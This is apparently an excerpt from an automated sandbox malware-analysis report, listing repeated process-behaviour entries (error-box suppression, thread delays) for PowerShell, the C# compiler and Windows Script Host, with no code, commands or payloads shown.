        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
        Source: C:\Windows\SysWOW64\wscript.exeWindow found: window name: WSH-TimerJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6721Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2909Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1060Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 4067Jump to behavior
